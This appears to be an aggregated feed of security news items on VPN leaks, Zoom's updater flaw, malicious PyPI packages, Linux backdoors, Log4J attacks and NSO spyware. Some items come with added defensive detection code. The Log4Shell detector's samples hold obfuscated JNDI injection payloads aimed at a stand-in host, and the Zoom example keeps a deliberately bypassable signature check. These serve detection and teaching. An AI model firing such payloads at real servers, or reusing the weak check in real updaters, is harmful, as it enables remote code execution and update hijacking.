iOS VPNs have leaked traffic for more than 2 years, researcher claims

A security researcher says that Apple’s iOS devices don’t fully route all network traffic through VPNs, a potential security issue the device maker has known about for years.

Michael Horowitz, a longtime computer security blogger and researcher, puts it plainly—if contentiously—in a continually updated blog post. “VPNs on iOS are broken,” he says.

Any third-party VPN seems to work at first, giving the device a new IP address, DNS servers, and a tunnel for new traffic, Horowitz writes. But sessions and connections established before a VPN is activated do not terminate and, in Horowitz’s findings with advanced router logging, can still send data outside the VPN tunnel while it’s active.
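One way to reproduce the check Horowitz describes with ordinary router flow logs, as an added example that is not part of the article or his write-up: take the first flow to the VPN server as the moment the tunnel came up, then list every later flow from the device that did not go to the VPN server or stay on the LAN, and mark the ones whose destination was already in use before the tunnel started (the sessions the client failed to tear down). The log format, the LAN prefix, the device and VPN addresses and the sample lines are all constructed for this example; adapt `parse_flow` to whatever your router exports.

```python
"""Find device traffic that bypassed the VPN tunnel after it came up.

Added example; not the article's code and not Horowitz's. Assumptions: the
router exports one flow per line as "<ISO-8601 time> <src_ip> <dst_ip>:<port>
<proto>" (adapt parse_flow to your export), the LAN prefix and the VPN
server address are known, and the first flow to the VPN server marks the
moment the tunnel came up. The log below is constructed for this example.
"""
import ipaddress
from dataclasses import dataclass
from datetime import datetime

DEVICE_IP = "192.168.1.20"                    # the phone under test (assumed)
VPN_SERVER = "198.51.100.5"                   # the VPN endpoint (assumed)
LAN = ipaddress.ip_network("192.168.1.0/24")  # local traffic is expected outside the tunnel

# Constructed router log: a connection to 203.0.113.10 exists before the
# tunnel comes up at 10:00:30 and keeps sending afterwards.
SAMPLE_LOG = """\
2022-08-15T10:00:00 192.168.1.20 203.0.113.10:443 tcp
2022-08-15T10:00:05 192.168.1.20 192.168.1.1:53 udp
2022-08-15T10:00:30 192.168.1.20 198.51.100.5:443 udp
2022-08-15T10:00:45 192.168.1.20 203.0.113.10:443 tcp
2022-08-15T10:01:00 192.168.1.20 198.51.100.5:443 udp
2022-08-15T10:01:05 192.168.1.20 192.168.1.1:53 udp
2022-08-15T10:01:10 192.168.1.20 203.0.113.77:5223 tcp
2022-08-15T10:01:20 192.168.1.31 203.0.113.10:443 tcp
"""


@dataclass(frozen=True)
class Flow:
    ts: datetime
    src: str
    dst: str
    dport: int
    proto: str


def parse_flow(line: str) -> Flow:
    ts, src, dst_port, proto = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return Flow(datetime.fromisoformat(ts), src, dst, int(port), proto)


def find_leaks(log_text: str, device_ip: str = DEVICE_IP,
               vpn_server: str = VPN_SERVER, lan=LAN):
    """Return (flow, pre_existing) for each flow the device sent outside the
    tunnel after it came up. pre_existing is True when the same
    destination/port/protocol was already in use before the tunnel started,
    i.e. a session the VPN client did not tear down."""
    flows = [parse_flow(l) for l in log_text.splitlines() if l.strip()]
    mine = [f for f in flows if f.src == device_ip]
    starts = [f.ts for f in mine if f.dst == vpn_server]
    if not starts:
        return []                  # tunnel never came up; nothing to judge
    vpn_start = min(starts)
    before = {(f.dst, f.dport, f.proto) for f in mine if f.ts < vpn_start}
    leaks = []
    for f in mine:
        if f.ts < vpn_start or f.dst == vpn_server:
            continue
        if ipaddress.ip_address(f.dst) in lan:
            continue               # DNS to the router etc. legitimately stays local
        leaks.append((f, (f.dst, f.dport, f.proto) in before))
    return leaks


if __name__ == "__main__":
    for flow, pre in find_leaks(SAMPLE_LOG):
        kind = "pre-existing session" if pre else "new connection"
        print(f"{flow.ts.time()} {flow.dst}:{flow.dport}/{flow.proto} outside tunnel ({kind})")
```

On the constructed log the script reports the 10:00:45 packet to 203.0.113.10:443 as a pre-existing session leaking past the tunnel. Run it against a capture taken with the VPN toggled mid-session; anything it flags as pre-existing is exactly the behaviour the blog post describes, and it is the class of finding worth checking with `tcpdump` on the router before blaming the VPN vendor.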

#apple, #biz-it, #ios, #michael-horowitz, #privacy, #proton, #protonvpn, #security, #vpn

Update Zoom for Mac now to avoid root-access vulnerability

A critical vulnerability in Zoom for Mac OS allowed unauthorized users to downgrade Zoom or even gain root access. It has been fixed, and users should update now.

If you’re using Zoom on a Mac, it’s time for a manual update. The video conferencing software’s latest update fixes an auto-update vulnerability that could have allowed malicious programs to use its elevated installing powers, granting escalated privileges and control of the system.

The vulnerability was first discovered by Patrick Wardle, founder of the Objective-See Foundation, a nonprofit Mac OS security group. Wardle detailed in a talk at Def Con last week how Zoom’s installer asks for a user password when installing or uninstalling, but its auto-update function, enabled by default, doesn’t need one. Wardle found that Zoom’s updater is owned by and runs as the root user.

It seemed secure, as only Zoom clients could connect to the privileged daemon, and only packages signed by Zoom could be extracted. The problem is that the signature check was a string match, so a package whose file name contained the strings the check looked for (“Zoom Video ... Certification Authority Apple Root CA.pkg”) passed it. That meant malicious actors could force Zoom to downgrade to a buggier, less-secure version or even pass it an entirely different package that could give them root access to the system.
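The pattern behind that bypass, next to a hardened version, as an added example that is not Zoom's code: the weak check greps the whole output of the signature tool for the expected certificate names, and that output begins with a line echoing the package's own file name, so a cleverly named unsigned package passes. The hardened check requires a "signed" status, parses only the certificate-chain entries, pins the exact leaf subject including the team ID, and refuses version downgrades. The three tool outputs are constructed to resemble `pkgutil --check-signature` output, and the expected leaf subject, team ID and version numbers are assumptions.

```python
"""Package-signature check: the string-matching pattern described above next
to a hardened version.

Added example, not Zoom's code. The three tool outputs below are constructed
to look like `pkgutil --check-signature` output; the expected leaf subject,
the team ID and the version numbers are assumptions.
"""
import re

# Assumed trust anchors. Pin the exact leaf subject including the team ID,
# never a fragment of it.
EXPECTED_LEAF = "Developer ID Installer: Zoom Video Communications, Inc. (ABCDE12345)"
EXPECTED_ROOT = "Apple Root CA"

GENUINE = """\
Package "ZoomUpdate.pkg":
   Status: signed by a developer certificate issued by Apple for distribution
   Certificate Chain:
    1. Developer ID Installer: Zoom Video Communications, Inc. (ABCDE12345)
    2. Developer ID Certification Authority
    3. Apple Root CA
"""

# Unsigned package whose file name carries the strings the weak check greps for.
SPOOFED = """\
Package "Zoom Video Communications, Inc. Developer ID Certification Authority Apple Root CA.pkg":
   Status: no signature
"""

# Validly signed, but by someone else's Developer ID.
OTHER_SIGNER = """\
Package "update.pkg":
   Status: signed by a developer certificate issued by Apple for distribution
   Certificate Chain:
    1. Developer ID Installer: Example Corp (ZZZZZ99999)
    2. Developer ID Certification Authority
    3. Apple Root CA
"""


def vulnerable_is_trusted(output: str) -> bool:
    """Substring search over the whole tool output, including the first line,
    which echoes the package's own file name."""
    needles = ("Zoom Video Communications, Inc.",
               "Developer ID Certification Authority",
               "Apple Root CA")
    return all(n in output for n in needles)


CHAIN_ENTRY = re.compile(r"^\s*\d+\.\s+(.+?)\s*$")


def hardened_is_trusted(output: str, leaf: str = EXPECTED_LEAF,
                        root: str = EXPECTED_ROOT) -> bool:
    """Require a signed status, then compare the parsed chain, never the raw text."""
    lines = [l.strip() for l in output.splitlines()]
    if not any(l.startswith("Status: signed by a developer certificate") for l in lines):
        return False
    if "Certificate Chain:" not in lines:
        return False
    entries = lines[lines.index("Certificate Chain:") + 1:]
    chain = [m.group(1) for m in map(CHAIN_ENTRY.match, entries) if m]
    return len(chain) >= 2 and chain[0] == leaf and chain[-1] == root


def parse_version(v: str):
    return tuple(int(p) for p in v.split("."))


def is_downgrade(installed: str, candidate: str) -> bool:
    return parse_version(candidate) < parse_version(installed)


def should_install(installed: str, candidate: str, output: str) -> bool:
    """A privileged updater must hold both lines: valid signer and no rollback."""
    return hardened_is_trusted(output) and not is_downgrade(installed, candidate)


if __name__ == "__main__":
    for name, out in (("genuine", GENUINE), ("spoofed", SPOOFED), ("other signer", OTHER_SIGNER)):
        print(f"{name:13} weak={vulnerable_is_trusted(out)!s:5} hardened={hardened_is_trusted(out)}")
```

Even the hardened version parses human-readable tool output, which is only acceptable for a demonstration; a root-running updater should call the platform's code-signing API directly, pin the team ID, and treat a version older than the installed one as an attack rather than an update.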

#biz-it, #def-con, #mac, #mac-os, #objective-see, #patrick-wardle, #security, #zoom

10 malicious Python packages exposed in latest repository attack

Supply-chain attacks, like the latest PyPI discovery, insert malicious code into seemingly functional software packages used by developers. They’re becoming increasingly common. (credit: Getty Images)

Researchers have discovered yet another set of malicious packages in PyPI, the official and most popular repository for Python programs and code libraries. Those duped by the seemingly familiar packages could be subject to malware downloads or theft of user credentials and passwords.

Check Point Research, which reported its findings Monday, wrote that it didn’t know how many people had downloaded the 10 packages, but it noted that PyPI has 613,000 active users, and its code is used in more than 390,000 projects. Installing from PyPI through the pip command is a foundational step for starting or setting up many Python projects. PePy, a site that estimates Python project downloads, suggests most of the malicious packages saw hundreds of downloads.
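A pre-install check for the "seemingly familiar" names such packages rely on, as an added example that is not Check Point's tooling: normalise each requirement name the way PyPI does, skip exact matches against a list of well-known packages, and flag names within a small edit distance of one. `POPULAR` is a short constructed allowlist (a real check would load the top-downloaded package names), and the requirements text is constructed.

```python
"""Flag requirement names that look like, but are not, well-known PyPI packages.

Added example, not Check Point's tooling. POPULAR is a short constructed
allowlist (load the top-downloaded package names for real use); the
requirements text is constructed.
"""
import re

POPULAR = frozenset({
    "requests", "numpy", "urllib3", "pyyaml", "python-dateutil",
    "setuptools", "cryptography", "boto3", "six", "pip",
})

# Constructed requirements.txt with two lookalike names mixed in.
SAMPLE_REQUIREMENTS = """\
# constructed requirements.txt
requests==2.28.1
requesst
numpy>=1.23
PyYAML
pyyml
boto3
--index-url https://pypi.org/simple
"""


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of '-', '_' and '.' to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance (insert, delete, substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


REQ_NAME = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def requirement_names(text: str):
    """Project names from a requirements file, ignoring comments, specifiers and options."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):   # blank, or an option such as --index-url / -r
            continue
        m = REQ_NAME.match(line)
        if m:
            names.append(m.group(1))
    return names


def lookalikes(names, popular=POPULAR, max_distance: int = 2):
    """Return (requested, closest_popular, distance) for names that are near,
    but not equal to, a well-known package."""
    findings = []
    for raw in names:
        name = normalize(raw)
        if name in popular:
            continue
        distance, closest = min((edit_distance(name, p), p) for p in popular)
        if 0 < distance <= max_distance:
            findings.append((raw, closest, distance))
    return findings


if __name__ == "__main__":
    for raw, closest, d in lookalikes(requirement_names(SAMPLE_REQUIREMENTS)):
        print(f"suspicious: {raw!r} is {d} edit(s) from {closest!r}")
```

This is a heuristic, not a verdict: a flagged name may be a legitimate small project, and a malicious package can carry a name that is nothing like a popular one. It belongs alongside hash-pinned requirements and an internal mirror, not in place of them.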

Such supply-chain attacks are becoming increasingly common, especially among open source software repositories that support a wide swath of the world’s software. Python’s repository is a frequent target, with researchers finding malicious packages in September 2017; June, July, and November 2021; and June of this year. But trick packages have also been found in RubyGems in 2020, NPM in December 2021, and many more open source repositories.

#biz-it, #github, #malware, #npm, #pypi, #python, #security, #sigstore, #software-supply-chain-attack, #supply-chain-attack, #tech

Microsoft makes major course reversal, allows Office to run untrusted macros

Microsoft has stunned core parts of the security community with a decision to quietly reverse course and allow untrusted macros to be opened by default in Word and other Office applications.

In February, the software maker announced a major change it said it enacted to combat the growing scourge of ransomware and other malware attacks. Going forward, macros downloaded from the Internet would be disabled entirely by default. Whereas previously, Office provided alert banners that could be disregarded with the click of a button, the new warnings would provide no such way to enable the macros.

“We will continue to adjust our user experience for macros, as we’ve done here, to make it more difficult to trick users into running malicious code via social engineering while maintaining a path for legitimate macros to be enabled where appropriate via Trusted Publishers and/or Trusted Locations,” Microsoft Office Program Manager Tristan Davis wrote in explaining the reason for the move.

#biz-it, #macros, #microsoft, #office, #security

New ultra-stealthy Linux backdoor isn’t your everyday malware discovery

Researchers have unearthed something that doesn’t turn up often in the realm of malware: a mature, never-before-seen Linux backdoor that uses novel evasion techniques to conceal its presence on infected servers, in some cases even from a forensic investigation.

On Thursday, researchers from Intezer and The BlackBerry Threat Research & Intelligence Team said that the previously undetected backdoor combines high levels of access with the ability to scrub any sign of infection from the file system, system processes, and network traffic. Dubbed Symbiote, it targets financial institutions in Brazil and was first detected in November.
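A generic cross-view check for the "scrub any sign of infection from system processes" claim, as an added example that is neither the researchers' tooling nor a Symbiote-specific detector: compare the /proc directory listing (what `ps` and `ls` see) against a PID-by-PID probe with `kill(pid, 0)`. A userland hook that filters directory listings does not also make the probe fail, so any PID the probe finds that neither listing showed deserves a look. The pure comparison is separated from the Linux-only collectors so it can be exercised on constructed sets.

```python
"""Cross-view check for processes hidden from /proc directory listings.

Added example; not Intezer's or BlackBerry's tooling and not specific to
Symbiote. Linux only. Limits are noted in the comments.
"""
import os
import sys


def listed_pids(proc: str = "/proc"):
    """The view a hooked readdir() can filter."""
    return {int(name) for name in os.listdir(proc) if name.isdigit()}


def is_thread_group_leader(pid: int) -> bool:
    """kill(tid, 0) also succeeds for thread IDs, which /proc never lists at the
    top level; keep only entries whose Tgid equals their own PID."""
    try:
        with open(f"/proc/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:
        return True   # status unreadable: cannot rule it out, keep it for review
    return False


def probed_pids(max_pid: int):
    """The view that does not depend on directory listings: ask the kernel about
    every PID. EPERM still means the process exists."""
    found = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        if is_thread_group_leader(pid):
            found.add(pid)
    return found


def hidden_pids(listed_before, probed, listed_after):
    """PIDs the probe saw that neither listing showed. Two listings bracket the
    probe so that processes which start or exit mid-scan are mostly not
    reported; a process that starts and exits entirely inside the scan window
    can still produce a false positive."""
    return probed - listed_before - listed_after


def scan(max_pid=None):
    if not sys.platform.startswith("linux"):
        raise RuntimeError("this check reads /proc and is Linux-only")
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as fh:
            max_pid = int(fh.read())
    before = listed_pids()
    probed = probed_pids(max_pid)   # several seconds with a 4M pid_max
    after = listed_pids()
    return sorted(hidden_pids(before, probed, after))


if __name__ == "__main__":
    hidden = scan()
    print("PIDs hidden from /proc listing:", hidden or "none")
```

Run it as root: with `hidepid` mounted on /proc, other users' processes are invisible to an unprivileged listing and unreadable to the probe's status check, which shows up as noise. A rootkit that also hooks the `kill` wrapper defeats this particular pair of views, which is why a real investigation should additionally compare against a view taken from outside the suspect userland (a static binary, or the disk image offline).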

Researchers for Intezer and BlackBerry wrote:

#backdoor, #biz-it, #linux, #rootkits, #security

Information security gets personal: How to protect yourself and your stuff

At the Ars Frontiers event in Washington, DC, I had the privilege of moderating two panels on two closely linked topics: digital privacy and information security. Despite significant attempts to improve things, conflicting priorities and inadequate policy have weakened both privacy and security. Some of the same fundamental issues underlie the weaknesses in both: Digital privacy and information security are still too demanding for average people to manage, let alone master.

Our privacy panel consisted of Electronic Frontier Foundation deputy executive Kurt Opsahl, security researcher Runa Sandvik, and ACLU Senior Policy Analyst Jay Stanley. Individuals trying to protect their digital privacy face “a constant arms race between what the companies are trying to do, or doing because they can, versus then what people are saying that they either like or don’t like,” Sandvik explained.

#ars-frontiers, #ars-technica-videos, #biz-it, #frontiers-recap, #infosec, #security

Researchers devise iPhone malware that runs even when device is turned off

When you turn off an iPhone, it doesn’t fully power down. Chips inside the device continue to run in a low-power mode that makes it possible to locate lost or stolen devices using the Find My feature or use credit cards and car keys after the battery dies. Now researchers have devised a way to abuse this always-on mechanism to run malware that remains active even when an iPhone appears to be powered down.

It turns out that the iPhone’s Bluetooth chip—which is key to making features like Find My work—has no mechanism for digitally signing or even encrypting the firmware it runs. Academics at Germany’s Technical University of Darmstadt figured out how to exploit this lack of hardening to run malicious firmware that allows the attacker to track the phone’s location or run new features when the device is turned off.

This video provides a high-level overview of some of the ways an attack can work.

#biz-it, #firmware, #ios, #iphone, #security

Researchers used a decommissioned satellite to broadcast hacker TV

Independent researchers and the United States military have become increasingly focused on orbiting satellites’ potential security vulnerabilities in recent years. These devices, which are built primarily with durability, reliability, and longevity in mind, were largely never intended to be ultra-secure. But at the ShmooCon security conference in Washington, DC, on Friday, embedded device security researcher Karl Koscher raised questions about a different phase of a satellite’s life cycle: what happens when an old satellite is being decommissioned and transitioning to a “graveyard orbit”?

Koscher and his colleagues received permission last year to access and broadcast from a Canadian satellite known as Anik F1R, launched to support Canadian broadcasters in 2005 and designed for 15 years of use. The satellite’s coverage extends below the US southern border and out to Hawaii and the easternmost part of Russia. The satellite will move to its graveyard orbit soon, and nearly all other services that use it have already migrated to a new satellite. Because the researchers could still talk to the satellite, through special access to an uplink license and a transponder slot lease, Koscher had the opportunity to take over a transponder and broadcast to the Northern Hemisphere.

#biz-it, #hacking, #satellite, #security

Data-harvesting code in mobile apps sends user data to “Russia’s Google”

Photo taken on October 12, 2021 in Moscow shows Russia’s internet search engine Yandex’s logo on a laptop screen. (credit: Kirill Kudryavtsev | AFP via Getty Images)

Russia’s biggest Internet company has embedded code into apps found on mobile devices that allows information about millions of users to be sent to servers located in its home country.

The revelation relates to software created by Yandex that permits developers to create apps for devices running Apple’s iOS and Google’s Android, systems that run the vast majority of the world’s smartphones.

Yandex collects user data harvested from mobiles, before sending the information to servers in Russia. Researchers have raised concerns the same “metadata” may then be accessed by the Kremlin and used to track people through their mobiles.

#android, #apple, #biz-it, #data-harvesting, #google, #ios, #security, #yandex

A big bet to kill the password for good

After years of tantalizing hints that a passwordless future is just around the corner, you’re probably still not feeling any closer to that digital unshackling. Ten years into working on the issue, though, the FIDO Alliance, an industry association that specifically works on secure authentication, thinks it has finally identified the missing piece of the puzzle.

On Thursday, the organization published a white paper that lays out FIDO’s vision for solving the usability issues that have dogged passwordless features and, seemingly, kept them from achieving broad adoption. FIDO’s members collaborated to produce the paper, and they span chipmakers like Intel and Qualcomm, prominent platform developers like Amazon and Meta, financial institutions like American Express and Bank of America, and the developers of all major operating systems—Google, Microsoft, and Apple.

#biometrics, #biz-it, #fido, #hardware-tokens, #passwords, #security

WHO, US worry Ukrainian biological lab samples could spill, go to Russians

A health care worker carries test tubes while on duty in the bacteriological laboratory at the Lviv Regional Laboratory Centre of the State Sanitary and Epidemiological Service, Lviv, western Ukraine. (credit: Getty | Future Publishing)

The World Health Organization has advised officials in Ukraine to destroy any high-risk pathogens housed in public health laboratories in order to prevent their release amid the Russian onslaught, according to a report by Reuters.

The agency said that it has worked with Ukrainian officials for years to promote security practices at its laboratories to prevent “accidental or deliberate release of pathogens.” As part of that longstanding work, “WHO has strongly recommended to the Ministry of Health in Ukraine and other responsible bodies to destroy high-threat pathogens to prevent any potential spills,” the agency said in an email to Reuters. The WHO did not clarify when it made that recommendation or if it was carried out.

The news follows Senate testimony on Tuesday by Victoria Nuland, US Undersecretary of State for Political Affairs, who said that the US is “quite concerned” that Russian troops will seek out Ukraine’s biological research laboratories to seize control of any potentially dangerous samples.

#biological-weapons, #biowarfare, #chemical-weapons, #public-health, #research-laboratories, #russia, #science, #security, #ukraine, #us

Attackers can force Amazon Echos to hack themselves with self-issued commands

A group of Amazon Echo smart speakers, including Echo Studio, Echo, and Echo Dot models. (credit: Neil Godwin/Future Publishing via Getty Images; T3 Magazine/Getty Images)

Academic researchers have devised a new working exploit that commandeers Amazon Echo smart speakers and forces them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances.

The attack works by using the device’s speaker to issue voice commands. As long as the speech contains the device wake word (usually “Alexa” or “Echo”) followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway University in London and Italy’s University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it’s trivial to bypass the measure by adding the word “yes” about six seconds after issuing the command. Attackers can also exploit what the researchers call the “FVV,” or full voice vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.

Alexa, go hack yourself

Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it “AvA,” short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it’s turned on so an attacker can utter a voice command instructing it to pair with an attacker’s Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands.

#amazon-echo, #biz-it, #eavesdropping, #exploits, #features, #security, #vulnerabilities

Namco Bandai promises Elden Ring is secure following Dark Souls exploit

In Elden Ring, you get a horse. (credit: Bandai Namco)

Last month, publisher Namco Bandai took down its online player-versus-player servers for all PC Dark Souls games after players found a serious vulnerability that allowed for remote execution of malicious code on an opponent’s computer. While a Reddit user who publicly identified that issue said the exploit would also work on Namco Bandai’s upcoming Elden Ring, the publisher is now assuring players that the highly anticipated title will be protected.

“We have extended the investigation to Elden Ring… and have made sure the necessary security measures are in place for this title on all target platforms,” Namco Bandai wrote in a tweet Wednesday morning.

The wording of that statement suggests that Elden Ring’s online services will launch as expected when the game is released on February 25. That’s important for players looking forward to online co-op gameplay, competitive multiplayer battles/invasions, and even basic message support between player worlds, as seen in Dark Souls.

#dark-souls, #elden-ring, #exploit, #gaming-culture, #namco-bandai, #security

Coming to a laptop near you: A new type of security chip from Microsoft

In November 2020, Microsoft unveiled Pluton, a security processor the company designed to thwart some of the most sophisticated types of hack attacks. On Tuesday, AMD said it would integrate the chip into its upcoming Ryzen CPUs for use in Lenovo’s ThinkPad Z Series of laptops.

Microsoft already used Pluton to secure Xbox Ones and Azure Sphere microcontrollers against attacks that involve people with physical access opening device cases and performing hardware hacks that bypass security protections. Such hacks are usually carried out by device owners who want to run unauthorized games or programs for cheating.

Now, Pluton is evolving to secure PCs against malicious physical hacks designed to install malware or steal cryptographic keys or other sensitive secrets. While many systems already have trusted platform modules or protections such as Intel’s Software Guard Extensions to secure such data, the secrets remain vulnerable to several types of attacks.

#amd, #biz-it, #lenovo, #pluton, #ryzen, #security, #thinkpad

Google warns that NSO hacking is on par with elite nation-state spies

A man walks by the building entrance of Israeli cyber company NSO Group at one of its branches in the Arava Desert on November 11, 2021, in Sapir, Israel. (credit: Amir Levy | Getty Images)

The Israeli spyware developer NSO Group has shocked the global security community for years with aggressive and effective hacking tools that can target both Android and iOS devices. The company’s products have been so abused by its customers around the world that NSO Group now faces sanctions, high-profile lawsuits, and an uncertain future. But a new analysis of the spyware maker’s ForcedEntry iOS exploit—deployed in a number of targeted attacks against activists, dissidents, and journalists this year—comes with an even more fundamental warning: Private businesses can produce hacking tools that have the technical ingenuity and sophistication of the most elite government-backed development groups.

Google’s Project Zero bug-hunting group analyzed ForcedEntry using a sample provided by researchers at the University of Toronto’s Citizen Lab, which published extensively this year about targeted attacks utilizing the exploit. Researchers from Amnesty International also conducted important research about the hacking tool this year. The exploit mounts a zero-click, or interactionless, attack, meaning that victims don’t need to click a link or grant a permission for the hack to move forward. Project Zero found that ForcedEntry used a series of shrewd tactics to target Apple’s iMessage platform, bypass protections the company added in recent years to make such attacks more difficult, and adroitly take over devices to install NSO’s flagship spyware implant Pegasus.

Apple released a series of patches in September and October that mitigate the ForcedEntry attack and harden iMessage against future, similar attacks. But the Project Zero researchers write in their analysis that ForcedEntry is still “one of the most technically sophisticated exploits we’ve ever seen.” NSO Group has achieved a level of innovation and refinement, they say, that is generally assumed to be reserved for a small cadre of nation-state hackers.

#biz-it, #forced-entry, #security, #wired

New PS4 homebrew exploit points to similar PS5 hacks to come

Sony’s PlayStation 4. (credit: Andrew Cunningham)

Hackers have released details of a new exploit that allows homebrew and custom firmware to be installed on PS4 consoles running relatively recent firmware. What’s more, the specifics of the exploit suggest similar homebrew capabilities may soon be available on some versions of the PlayStation 5.

The new exploit builds on a known error in the way that the PS4’s WebKit implementation utilizes font-faces. That exploit on the PS4 was publicized in October as a proof of concept after a similar error was found in Apple’s Safari WebKit implementation in September.

On the PS4, the full exploit can now be triggered by visiting a website with specially formatted JavaScript via the PS4 web browser, allowing the system to run kernel-level code that bypasses the console’s usual security protections. From there, the exploit can read files from an inserted USB stick and install homebrew software, including existing custom PS4 firmware.

#gaming-culture, #homebrew, #playstation, #security

Hackers launch over 840,000 attacks through Log4J flaw

Hackers including Chinese state-backed groups have launched more than 840,000 attacks on companies globally since last Friday, according to researchers, through a previously unnoticed vulnerability in a widely used piece of open-source software called Log4J.

Cyber security group Check Point said the attacks relating to the vulnerability had accelerated in the 72 hours since Friday, and that at some points its researchers were seeing more than 100 attacks a minute.

Perpetrators include “Chinese government attackers,” according to Charles Carmakal, chief technology officer of cyber company Mandiant.
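What the attack traffic Check Point counted looks like in a web or application log, and how to spot it, as an added example that is not Check Point's or Mandiant's tooling: the Log4j flaw being exploited here (CVE-2021-44228) is triggered by a `${jndi:...}` lookup in any string Log4j formats, and attackers quickly wrapped the keyword in nested lookups (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`) to slip past naive `jndi` string matching. The detector below resolves those lookup forms from the inside out, then matches on the resolved text. The sample lines are constructed; the nested forms handled are the common ones, not an exhaustive list, and detection is a stopgap while you patch.

```python
"""Spot Log4Shell-style JNDI lookups in log or request lines, including the
nested-lookup obfuscations used to evade naive string matching.

Added example; not Check Point's or Mandiant's tooling. It resolves the
lookup forms Log4j 2 evaluates before the JNDI lookup runs (${lower:x},
${upper:x}, ${::-x} and ${key:-default}), then looks for "${jndi:". Sample
lines are constructed. Patching Log4j is the fix; this only catches the
encodings it knows about.
"""
import re
from urllib.parse import unquote

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_HOLD = "\x00{"   # marks a lookup kept verbatim so the loop does not re-match it


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way Log4j would, or keep it verbatim."""
    low = body.lower()
    if body.startswith("::-"):            # ${::-j}            -> "j"
        return body[3:]
    if low.startswith("lower:"):          # ${lower:J}         -> "j"
        return body[6:].lower()
    if low.startswith("upper:"):          # ${upper:j}         -> "J"
        return body[6:].upper()
    if ":-" in body:                      # ${env:NOPE:-j}     -> default value "j"
        return body.split(":-", 1)[1]
    return _HOLD + body + "}"             # jndi:, date:, ...  -> keep for the final match


def normalize_lookups(text: str, max_rounds: int = 200) -> str:
    """Percent-decode, then collapse nested lookups from the inside out."""
    text = unquote(text)
    for _ in range(max_rounds):
        m = INNERMOST.search(text)
        if m is None:
            break
        text = text[:m.start()] + _resolve(m.group(1)) + text[m.end():]
    return text.replace(_HOLD, "${")


def looks_like_log4shell(line: str) -> bool:
    return JNDI.search(normalize_lookups(line)) is not None


# Constructed sample lines: 0 and 3 are benign, the rest carry a JNDI lookup.
SAMPLE_LINES = [
    "GET /index.html HTTP/1.1",
    "User-Agent: ${jndi:ldap://203.0.113.5:1389/a}",
    "X-Api-Version: ${${lower:j}ndi:${lower:l}dap://203.0.113.5/a}",
    "${date:yyyy-MM-dd} application started",
    "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1",
    "Referer: ${${env:NaN:-j}ndi:ldap://203.0.113.5/a}",
]


def flagged_indices(lines):
    return [i for i, line in enumerate(lines) if looks_like_log4shell(line)]


if __name__ == "__main__":
    for i in flagged_indices(SAMPLE_LINES):
        print(f"line {i}: {normalize_lookups(SAMPLE_LINES[i])}")
```

Point it at access logs and at the headers your WAF captured, not just the request line: the User-Agent, Referer and custom headers in the sample are where most of the real payloads arrived, because anything the application logs is a trigger. The attacker-controlled host in a hit (`203.0.113.5` in the samples) is the indicator to hunt for in outbound LDAP, RMI and HTTP connections from the affected servers.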

#biz-it, #china, #hacking, #log4j, #security

iPhones of US diplomats hacked using “0-click” exploits from embattled NSO

The iPhones of nine US State Department officials were infected by powerful and stealthy malware developed by NSO Group, the Israeli exploit seller that has come under increasing scrutiny for selling its wares to governments that have turned them against journalists, lawyers, activists, and US allies.

The US officials, either stationed in Uganda or focusing on issues related to that country, received warnings from Apple informing them their iPhones were being targeted by hackers. Citing unnamed people with knowledge of the attacks, Reuters said the hackers used software from NSO.

No clicking required

As previously reported, NSO software known as Pegasus uses exploits sent through messaging apps that infect iPhones and Android devices without requiring targets to click links or take any other action. From there, the devices run hard-to-detect malware that can download photos, contacts, text messages, and other data. The malware also allows the operator to listen to audio and view video in real time.

#biz-it, #iphone, #nso-group, #security

New secret-spilling hole in Intel CPUs sends company patching (again)

Intel is fixing a vulnerability that unauthorized people with physical access can exploit to install malicious firmware on the chip to defeat a variety of measures, including protections provided by Bitlocker, trusted platform modules, anti-copying restrictions, and others.

The vulnerability—present in Pentium, Celeron, and Atom CPUs on the Apollo Lake, Gemini Lake, and Gemini Lake Refresh platforms—allows skilled hackers with possession of an affected chip to run it in debug and testing modes used by firmware developers. Intel and other chipmakers go to great lengths to prevent such access by unauthorized people.

Once in developer mode, an attacker can extract the key used to encrypt data stored in the TPM enclave and, in the event TPM is being used to store a Bitlocker key, defeat that latter protection as well. An adversary could also bypass code-signing restrictions that prevent unauthorized firmware from running in the Intel Management Engine, a subsystem inside vulnerable CPUs, and from there permanently backdoor the chip.

#central-processing-unit, #security, #tech

Google Fi is getting end-to-end encrypted phone calls

Google’s MVNO cell phone service, Google Fi, is getting a surprise new feature: encrypted phone calls. Encrypted voice chats via messaging apps have been available for a while, but this is the first time we’ve seen a company hijack the regular phone system for end-to-end encrypted calls. Open the phone app, dial a number, and your call can be encrypted.

